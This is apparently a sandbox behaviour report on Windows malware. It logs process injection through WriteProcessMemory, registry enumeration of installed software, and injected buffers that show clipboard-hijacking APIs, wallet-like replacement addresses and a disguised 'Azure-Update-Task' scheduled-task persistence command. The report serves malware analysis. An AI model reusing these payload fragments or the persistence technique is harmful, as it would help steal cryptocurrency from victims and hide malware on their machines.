 buffer: Ü0 0 0&0.030:0C0H0Q0V0^0c0k0p0y0~0‹0‘0˜0ž0¤0©0¯0µ0º0À0Æ0Ë0Ñ0×0Ü0â0è0í0ó0ù0þ01 1111#1)1/141:1@1E1K1Q1V1]1b1i1n1t1z1‚1‰1Ž1•1š1¡1¦1¬1²1·1½1Ã1È1Ï1×1Ý1ã1ë1ò1÷1ý122222 2%2+21262<2B2G2M2S2X2^2d2k22Ÿ2¨2µ2Â2Ô2Ù2æ2ú2!343Q3a3q3v3†3“3ª3Í3Ó3â3ñ3ú3 4¤4¶4Ç4Ô4à4í45515N5\5i5v5‚55¨5´5ß5ì5ù56!6L6Y6f66‘6Ÿ6¬6¹6È6Õ6î6777+777D7]7i7š7§7´7Í7æ7ÿ7818J8c8|8•8¡8Ô8í8ù8949U9`9g9q9y9ƒ9Œ9’9™9®9»9È9Õ9Û9ó9ý9::5:G:³:õ:;9;C;S;^;)<6<G<h<<Ï<û<y=’=¢=>>>(>=>œ>©>¶>Ã>å>v?ƒ??? $D9H9L9P9T9X9\9`9d9h9l9p9t9x9
base_address: 0x00404000
process_identifier: 2464
process_handle: 0x00000538
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2464
process_handle: 0x00000538
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL#·^à ¨ Ç à@  @…ÄÆWàÿ  H.text$§ ¨ `.rsrcÿàª@@.reloc ²@B
base_address: 0x00400000
process_identifier: 3156
process_handle: 0x00000368
1 1 0

WriteProcessMemory

 buffer:  €P€8€€h€ àÌlã“Ì4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°,StringFileInfo000004b0Comments"CompanyName*FileDescription0FileVersion1.0.0.02 InternalNameStub.exe&LegalCopyright*LegalTrademarks: OriginalFilenameStub.exe"ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" > <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"> <dpiAware>true</dpiAware> </asmv3:windowsSettings> </asmv3:application> </assembly>
base_address: 0x0040e000
process_identifier: 3156
process_handle: 0x00000368
1 1 0

WriteProcessMemory

 buffer: À 7
base_address: 0x00410000
process_identifier: 3156
process_handle: 0x00000368
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 3156
process_handle: 0x00000368
1 1 0

WriteProcessMemory

 buffer: <0>(0>h0>J0>X0>v0>KERNEL32.DLLExitProcessGetProcAddressLoadLibraryAVirtualProtect >2759P9T9X9\9p9´9À9 >2759P9T9X9\9p9´9À9
base_address: 0x007e3000
process_identifier: 3248
process_handle: 0x00000538
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 3248
process_handle: 0x00000538
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELèu=^à  Bna €@ À@…aW€Ø   H.texttA B `.rsrcØ€D@@.reloc  J@B
base_address: 0x00400000
process_identifier: 4076
process_handle: 0x000002a4
1 1 0

WriteProcessMemory

 buffer:  €8€P€h€€ €Dè‚êD4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°¤StringFileInfo€000004b0,FileDescription 0FileVersion0.0.0.08 InternalNameuactest.exe(LegalCopyright @ OriginalFilenameuactest.exe4ProductVersion0.0.0.08Assembly Version0.0.0.0<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x00408000
process_identifier: 4076
process_handle: 0x000002a4
1 1 0

WriteProcessMemory

 buffer: ` p1
base_address: 0x0040a000
process_identifier: 4076
process_handle: 0x000002a4
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 4076
process_handle: 0x000002a4
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÅn=^à  î; @@ €@…”;W@è` \:  H.textô  `.rsrcè@@@.reloc `.@B
base_address: 0x00400000
process_identifier: 3936
process_handle: 0x000002ac
1 1 0

WriteProcessMemory

 buffer: 0 ð;
base_address: 0x00406000
process_identifier: 3936
process_handle: 0x000002ac
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 3936
process_handle: 0x000002ac
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $±ŽÀœõï®Ïõï®Ïõï®Ï®‡¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB”`à ä @P@…l*<@€)8 0.text­ `.rdataŽ @@.data`0@À.reloc@ @B
base_address: 0x00400000
process_identifier: 3316
process_handle: 0x00000538
1 1 0

WriteProcessMemory

 buffer: Ø*è*ú*++,+>+J+R+n+G2A/CLP/05/RYS1H9NFqUtQzeA4cJmZDNcvB76bDQxuo92Qk39cHDmev78NtmyeGQs1fDht8U8NKWZbdM7bc1qvlhr9gykz9h2zgskxad0lt2xu9yy4pwscld556LcAjxUppjwEqyNvKeySys3xQZx2dTK6BzSMBW6dhENFT9daN4MkkNCcVRpNnPc9sF5Jqltc1qelyznk4hgm5j6wwr0xfhw8hqwgwyzamsjwfg540xE269734e6C856a5971Ec5146fF5cC491682Ade0e00000L0000T00MON00000000000000000000000LcAjxUppjwEqyNvKeySys3xQZx2dTK6BzS00000000000000W000000085Y45vaBPdTLcfUEVhrrCK3TBedpFFYSwTKyvLYLDuszXkbW6prBw9zU1Wj4zxtrujEp7cwxC7WmyRWWCeH2Vu6rAcX249pD8t9R5NDwSAz1Zv3k1gWthHGGNzxuZufasaddr1q8pmkel9phluj64z7rluua9lyavu06fv9n45dvhcehjaftmwwq9e8x26dymexm7td77xaedzue0prf8xgt733ljlkjfsm8j7czAe2tdPwUPEZDqNhACJ3ZT5NdXjkNffGAwa4Mc9N87udKWYzt1VnFngLMnPEbnb1elmmn9wrrd4fpz9kecjjryuh26pcr3gd7k39u0kernel32.dllLoadLibraryWShlwapi.dllntdll.dllShell32.dllOle32.dllUser32.dllGetProcAddressGetModuleFileNameWCreateDirectoryWGlobalAllocGlobalFreeGlobalLockGlobalUnlockLocalAllocLocalFreelstrlenWStrChrWStrStrWStrStrIWStrToIntExWPathIsDirectoryWCoInitializeHeapFreeCreateMutexACreateMutexWGetLastErrorSHGetFolderPathAPathAppendWStringCbPrintfWmemsetwmemsetmemcpyOpenClipboardGetClipboardDataEmptyClipboardSetClipboardDataCloseClipboard\Microsoft\Network\sqlcmd.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr ""C:\Windows\System32\schtasks.exe0 @8#@x"@@$@ˆ%@È!@€!@ø#@P @à @˜ @%@ "@8!@B”` ´¸)¸B”`GCTL­.text$mn 0.idata$50 ˆ .rdata¸)´.rdata$zzzdbgl*(.idata$2”*.idata$3¨*0.idata$4Ø*¶.idata$60`.bss¨*`+ Ð*‚+( Ø*è*ú*++,+>+J+R+n+ÄLoadLibraryW®GetProcAddress×WaitForSingleObject†CloseHandle^ExitProcessåCreateProcessW­CopyFileW}Sleep4GlobalFreeKERNEL32.dllXSHGetFolderPathWSHELL32.dll
base_address: 0x00402000
process_identifier: 3316
process_handle: 0x00000538
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $±ŽÀœõï®Ïõï®Ïõï®Ï®‡¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB”`à ä @P@…l*<@€)8 0.text­ `.rdataŽ @@.data`0@À.reloc@ @BU‹ìƒìhà%@ÿ @‰Eü…À„TSV‹5 @Whü%@PÿÖh &@£ 0@ÿÐh$&@‰Eøÿ 0@h8&@‰Eðÿ 0@hP&@‹Øÿ 0@hd&@‹øÿ 0@hP&@‰Eôÿ 0@h|&@ÿuüÿ֋uühŒ&@V£80@ÿÐh &@V£0@ÿ80@h´&@V£D0@ÿ80@hÀ&@V£$0@ÿ80@hÌ&@V£<0@ÿ80@hØ&@V£0@ÿ80@hè&@V£40@ÿ80@hô&@V£0@ÿ80@h'@V£00@ÿ80@‹uøh '@V£ 0@ÿ80@h'@V£0@ÿ80@h'@V£T0@ÿ80@h('@Vÿ80@h4'@Vÿ80@hH'@W£X0@ÿ80@‹}ühX'@Wÿ80@hd'@Wÿ80@ht'@Wÿ80@h„'@W£@0@ÿ80@h”'@S£,0@ÿ80@h¨'@Vÿ80@‹uôh´'@V£0@ÿ80@‹]ðhÄ'@Sÿ80@hÌ'@S£(0@ÿ80@hÔ'@Sÿ80@hÜ'@V£0@ÿ80@hì'@V£H0@ÿ80@h(@V£\0@ÿ80@h(@V£0@ÿ80@h$(@V£P0@ÿ80@_^£L0@[ÉÃU‹ìì…ðûÿÿVhP3öVÿ0@…øýÿÿPVVjVÿ( @…Àxfh4(@…øýÿÿPÿ0@…øýÿÿPÿX0@…ÀuV…øýÿÿPÿD0@h\(@…øýÿÿPÿ0@…øýÿÿP…ðûÿÿPÿT0@…Àtøýÿÿè,^ÉÃV…øýÿÿP…ðûÿÿPÿ @øýÿÿè jÿÿ @ÌU‹ìƒìXSVWjD_W3ۍE¨SP‹ñÿ(0@jEì‰}¨SPÿ(0@ƒÄhj@ÿ0@ºx(@‰EüMü茺Ä(@Müèºè(@Müèr‹ÖMüèhºø(@Müè[‹}üEìPE¨PSShSSSWh)@ÿ @…Àu…ÿtWÿ00@3Àë)jÿÿuìÿ @ÿuì‹5 @ÿÖÿuðÿօÿtWÿ00@3À@_^[ÉÃU‹ì3À…Òtúÿÿÿv¸W€…ÀxH…Òt+VW‹}¾þÿÿ+ò+ù…Àt·f…Àt f‰ƒÁƒêuå_^…ҍAþEÁ3ɅÒf‰¸z€EÁë …Òt3Òf‰]ÂU‹ìQSVWjl[‹ò‹ùj1Xf9…¤Vÿ 0@ƒø"…”j0Vÿ0@…À…ƒjOVÿ0@…ÀuvjIVÿ0@…ÀuiSVÿ0@…Àu]Vÿ7ÿT0@‹Ø…ÛtK‹‹Ó+ÑúR肺P @YMü‰EüèûVÿ 0@MüCèéƒ?tÿ7ÿ @‹Eü‰3À@éýjl[fƒ>3ufVÿ 0@ƒø"uZj0Vÿ0@…ÀuMjOVÿ0@…Àu@jIVÿ0@…Àu3SVÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRèຘ @éYÿÿÿVÿ 0@jcYjb[ƒø*u[f9uVf9NuPj1Xf9FuGjO^Sÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRèvºà @éïþÿÿjb[Vÿ 0@ƒø*u^f9uYfƒ~nuRf9^uLj1^Xf9uAjOSÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRè ºˆ%@é‚þÿÿfƒ>LuiVÿ 0@ƒø"u]j0Vÿ0@…ÀuPjOVÿ0@…ÀuCjIVÿ0@jl[…Àu6SVÿ0@…Àu*Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR蚺8!@éþÿÿjl[fƒ>MufVÿ 0@ƒø"uZj0Vÿ0@…ÀuMjOVÿ0@…Àu@jIVÿ0@…Àu3SVÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRè+º€!@é¤ýÿÿVÿ 0@ƒø+udjlXf9u\fƒ~tuUjcXf9FuLj1^Xf9uAjOSÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR軺È!@é4ýÿÿ‹Îèê…Àt'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR艺
base_address: 0x00403000
process_identifier: 3316
process_handle: 0x00000538
0 0

WriteProcessMemory

 buffer: Ü0 0 0&0.030:0C0H0Q0V0^0c0k0p0y0~0‹0‘0˜0ž0¤0©0¯0µ0º0À0Æ0Ë0Ñ0×0Ü0â0è0í0ó0ù0þ01 1111#1)1/141:1@1E1K1Q1V1]1b1i1n1t1z1‚1‰1Ž1•1š1¡1¦1¬1²1·1½1Ã1È1Ï1×1Ý1ã1ë1ò1÷1ý122222 2%2+21262<2B2G2M2S2X2^2d2k22Ÿ2¨2µ2Â2Ô2Ù2æ2ú2!343Q3a3q3v3†3“3ª3Í3Ó3â3ñ3ú3 4¤4¶4Ç4Ô4à4í45515N5\5i5v5‚55¨5´5ß5ì5ù56!6L6Y6f66‘6Ÿ6¬6¹6È6Õ6î6777+777D7]7i7š7§7´7Í7æ7ÿ7818J8c8|8•8¡8Ô8í8ù8949U9`9g9q9y9ƒ9Œ9’9™9®9»9È9Õ9Û9ó9ý9::5:G:³:õ:;9;C;S;^;)<6<G<h<<Ï<û<y=’=¢=>>>(>=>œ>©>¶>Ã>å>v?ƒ??? $D9H9L9P9T9X9\9`9d9h9l9p9t9x9
base_address: 0x00404000
process_identifier: 3316
process_handle: 0x00000538
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 3316
process_handle: 0x00000538
1 1 0
Process injection Process 2568 injected into non-child 3844
Process injection Process 3476 injected into non-child 3936
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL#·^à ¨ Ç à@  @…ÄÆWàÿ  H.text$§ ¨ `.rsrcÿàª@@.reloc ²@B
base_address: 0x00400000
process_identifier: 3844
process_handle: 0x0000036c
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELèu=^à  Bna €@ À@…aW€Ø   H.texttA B `.rsrcØ€D@@.reloc  J@B
base_address: 0x00400000
process_identifier: 4008
process_handle: 0x000002b8
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÅn=^à  î; @@ €@…”;W@è` \:  H.textô  `.rsrcè@@@.reloc `.@B
base_address: 0x00400000
process_identifier: 3184
process_handle: 0x000002b4
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $±ŽÀœõï®Ïõï®Ïõï®Ï®‡¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB”`à ä @P@…l*<@€)8 0.text­ `.rdataŽ @@.data`0@À.reloc@ @B
base_address: 0x00400000
process_identifier: 2464
process_handle: 0x00000538
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $±ŽÀœõï®Ïõï®Ïõï®Ï®‡¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB”`à ä @P@…l*<@€)8 0.text­ `.rdataŽ @@.data`0@À.reloc@ @BU‹ìƒìhà%@ÿ @‰Eü…À„TSV‹5 @Whü%@PÿÖh &@£ 0@ÿÐh$&@‰Eøÿ 0@h8&@‰Eðÿ 0@hP&@‹Øÿ 0@hd&@‹øÿ 0@hP&@‰Eôÿ 0@h|&@ÿuüÿ֋uühŒ&@V£80@ÿÐh &@V£0@ÿ80@h´&@V£D0@ÿ80@hÀ&@V£$0@ÿ80@hÌ&@V£<0@ÿ80@hØ&@V£0@ÿ80@hè&@V£40@ÿ80@hô&@V£0@ÿ80@h'@V£00@ÿ80@‹uøh '@V£ 0@ÿ80@h'@V£0@ÿ80@h'@V£T0@ÿ80@h('@Vÿ80@h4'@Vÿ80@hH'@W£X0@ÿ80@‹}ühX'@Wÿ80@hd'@Wÿ80@ht'@Wÿ80@h„'@W£@0@ÿ80@h”'@S£,0@ÿ80@h¨'@Vÿ80@‹uôh´'@V£0@ÿ80@‹]ðhÄ'@Sÿ80@hÌ'@S£(0@ÿ80@hÔ'@Sÿ80@hÜ'@V£0@ÿ80@hì'@V£H0@ÿ80@h(@V£\0@ÿ80@h(@V£0@ÿ80@h$(@V£P0@ÿ80@_^£L0@[ÉÃU‹ìì…ðûÿÿVhP3öVÿ0@…øýÿÿPVVjVÿ( @…Àxfh4(@…øýÿÿPÿ0@…øýÿÿPÿX0@…ÀuV…øýÿÿPÿD0@h\(@…øýÿÿPÿ0@…øýÿÿP…ðûÿÿPÿT0@…Àtøýÿÿè,^ÉÃV…øýÿÿP…ðûÿÿPÿ @øýÿÿè jÿÿ @ÌU‹ìƒìXSVWjD_W3ۍE¨SP‹ñÿ(0@jEì‰}¨SPÿ(0@ƒÄhj@ÿ0@ºx(@‰EüMü茺Ä(@Müèºè(@Müèr‹ÖMüèhºø(@Müè[‹}üEìPE¨PSShSSSWh)@ÿ @…Àu…ÿtWÿ00@3Àë)jÿÿuìÿ @ÿuì‹5 @ÿÖÿuðÿօÿtWÿ00@3À@_^[ÉÃU‹ì3À…Òtúÿÿÿv¸W€…ÀxH…Òt+VW‹}¾þÿÿ+ò+ù…Àt·f…Àt f‰ƒÁƒêuå_^…ҍAþEÁ3ɅÒf‰¸z€EÁë …Òt3Òf‰]ÂU‹ìQSVWjl[‹ò‹ùj1Xf9…¤Vÿ 0@ƒø"…”j0Vÿ0@…À…ƒjOVÿ0@…ÀuvjIVÿ0@…ÀuiSVÿ0@…Àu]Vÿ7ÿT0@‹Ø…ÛtK‹‹Ó+ÑúR肺P @YMü‰EüèûVÿ 0@MüCèéƒ?tÿ7ÿ @‹Eü‰3À@éýjl[fƒ>3ufVÿ 0@ƒø"uZj0Vÿ0@…ÀuMjOVÿ0@…Àu@jIVÿ0@…Àu3SVÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRèຘ @éYÿÿÿVÿ 0@jcYjb[ƒø*u[f9uVf9NuPj1Xf9FuGjO^Sÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRèvºà @éïþÿÿjb[Vÿ 0@ƒø*u^f9uYfƒ~nuRf9^uLj1^Xf9uAjOSÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRè ºˆ%@é‚þÿÿfƒ>LuiVÿ 0@ƒø"u]j0Vÿ0@…ÀuPjOVÿ0@…ÀuCjIVÿ0@jl[…Àu6SVÿ0@…Àu*Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR蚺8!@éþÿÿjl[fƒ>MufVÿ 0@ƒø"uZj0Vÿ0@…ÀuMjOVÿ0@…Àu@jIVÿ0@…Àu3SVÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRè+º€!@é¤ýÿÿVÿ 0@ƒø+udjlXf9u\fƒ~tuUjcXf9FuLj1^Xf9uAjOSÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR軺È!@é4ýÿÿ‹Îèê…Àt'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR艺
base_address: 0x00403000
process_identifier: 2464
process_handle: 0x00000538
0 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL#·^à ¨ Ç à@  @…ÄÆWàÿ  H.text$§ ¨ `.rsrcÿàª@@.reloc ²@B
base_address: 0x00400000
process_identifier: 3156
process_handle: 0x00000368
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELèu=^à  Bna €@ À@…aW€Ø   H.texttA B `.rsrcØ€D@@.reloc  J@B
base_address: 0x00400000
process_identifier: 4076
process_handle: 0x000002a4
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÅn=^à  î; @@ €@…”;W@è` \:  H.textô  `.rsrcè@@@.reloc `.@B
base_address: 0x00400000
process_identifier: 3936
process_handle: 0x000002ac
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $±ŽÀœõï®Ïõï®Ïõï®Ï®‡¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB”`à ä @P@…l*<@€)8 0.text­ `.rdataŽ @@.data`0@À.reloc@ @B
base_address: 0x00400000
process_identifier: 3316
process_handle: 0x00000538
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $±ŽÀœõï®Ïõï®Ïõï®Ï®‡¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB”`à ä @P@…l*<@€)8 0.text­ `.rdataŽ @@.data`0@À.reloc@ @BU‹ìƒìhà%@ÿ @‰Eü…À„TSV‹5 @Whü%@PÿÖh &@£ 0@ÿÐh$&@‰Eøÿ 0@h8&@‰Eðÿ 0@hP&@‹Øÿ 0@hd&@‹øÿ 0@hP&@‰Eôÿ 0@h|&@ÿuüÿ֋uühŒ&@V£80@ÿÐh &@V£0@ÿ80@h´&@V£D0@ÿ80@hÀ&@V£$0@ÿ80@hÌ&@V£<0@ÿ80@hØ&@V£0@ÿ80@hè&@V£40@ÿ80@hô&@V£0@ÿ80@h'@V£00@ÿ80@‹uøh '@V£ 0@ÿ80@h'@V£0@ÿ80@h'@V£T0@ÿ80@h('@Vÿ80@h4'@Vÿ80@hH'@W£X0@ÿ80@‹}ühX'@Wÿ80@hd'@Wÿ80@ht'@Wÿ80@h„'@W£@0@ÿ80@h”'@S£,0@ÿ80@h¨'@Vÿ80@‹uôh´'@V£0@ÿ80@‹]ðhÄ'@Sÿ80@hÌ'@S£(0@ÿ80@hÔ'@Sÿ80@hÜ'@V£0@ÿ80@hì'@V£H0@ÿ80@h(@V£\0@ÿ80@h(@V£0@ÿ80@h$(@V£P0@ÿ80@_^£L0@[ÉÃU‹ìì…ðûÿÿVhP3öVÿ0@…øýÿÿPVVjVÿ( @…Àxfh4(@…øýÿÿPÿ0@…øýÿÿPÿX0@…ÀuV…øýÿÿPÿD0@h\(@…øýÿÿPÿ0@…øýÿÿP…ðûÿÿPÿT0@…Àtøýÿÿè,^ÉÃV…øýÿÿP…ðûÿÿPÿ @øýÿÿè jÿÿ @ÌU‹ìƒìXSVWjD_W3ۍE¨SP‹ñÿ(0@jEì‰}¨SPÿ(0@ƒÄhj@ÿ0@ºx(@‰EüMü茺Ä(@Müèºè(@Müèr‹ÖMüèhºø(@Müè[‹}üEìPE¨PSShSSSWh)@ÿ @…Àu…ÿtWÿ00@3Àë)jÿÿuìÿ @ÿuì‹5 @ÿÖÿuðÿօÿtWÿ00@3À@_^[ÉÃU‹ì3À…Òtúÿÿÿv¸W€…ÀxH…Òt+VW‹}¾þÿÿ+ò+ù…Àt·f…Àt f‰ƒÁƒêuå_^…ҍAþEÁ3ɅÒf‰¸z€EÁë …Òt3Òf‰]ÂU‹ìQSVWjl[‹ò‹ùj1Xf9…¤Vÿ 0@ƒø"…”j0Vÿ0@…À…ƒjOVÿ0@…ÀuvjIVÿ0@…ÀuiSVÿ0@…Àu]Vÿ7ÿT0@‹Ø…ÛtK‹‹Ó+ÑúR肺P @YMü‰EüèûVÿ 0@MüCèéƒ?tÿ7ÿ @‹Eü‰3À@éýjl[fƒ>3ufVÿ 0@ƒø"uZj0Vÿ0@…ÀuMjOVÿ0@…Àu@jIVÿ0@…Àu3SVÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRèຘ @éYÿÿÿVÿ 0@jcYjb[ƒø*u[f9uVf9NuPj1Xf9FuGjO^Sÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRèvºà @éïþÿÿjb[Vÿ 0@ƒø*u^f9uYfƒ~nuRf9^uLj1^Xf9uAjOSÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRè ºˆ%@é‚þÿÿfƒ>LuiVÿ 0@ƒø"u]j0Vÿ0@…ÀuPjOVÿ0@…ÀuCjIVÿ0@jl[…Àu6SVÿ0@…Àu*Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR蚺8!@éþÿÿjl[fƒ>MufVÿ 0@ƒø"uZj0Vÿ0@…ÀuMjOVÿ0@…Àu@jIVÿ0@…Àu3SVÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúRè+º€!@é¤ýÿÿVÿ 0@ƒø+udjlXf9u\fƒ~tuUjcXf9FuLj1^Xf9uAjOSÿ0@…Àu4jISÿ0@…Àu'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR軺È!@é4ýÿÿ‹Îèê…Àt'Vÿ7ÿT0@‹Ø…Ût‹‹Ó+ÑúR艺
base_address: 0x00403000
process_identifier: 3316
process_handle: 0x00000538
0 0
Time & API Arguments Status Return Repeated

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000670
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
